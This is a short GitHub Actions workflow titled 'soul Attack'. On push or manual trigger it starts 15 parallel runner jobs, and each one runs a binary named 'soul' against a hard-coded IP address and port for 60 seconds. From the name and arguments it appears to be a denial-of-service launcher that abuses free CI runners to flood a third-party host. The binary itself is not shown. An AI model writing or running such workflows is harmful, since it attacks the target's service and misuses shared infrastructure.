name: soul Attack

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  soul:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
      - uses: actions/checkout@v3
      - name: Make binary executable
        run: chmod +x soul
      - name: Run soul
        run: ./soul 20.204.88.77 10774 60
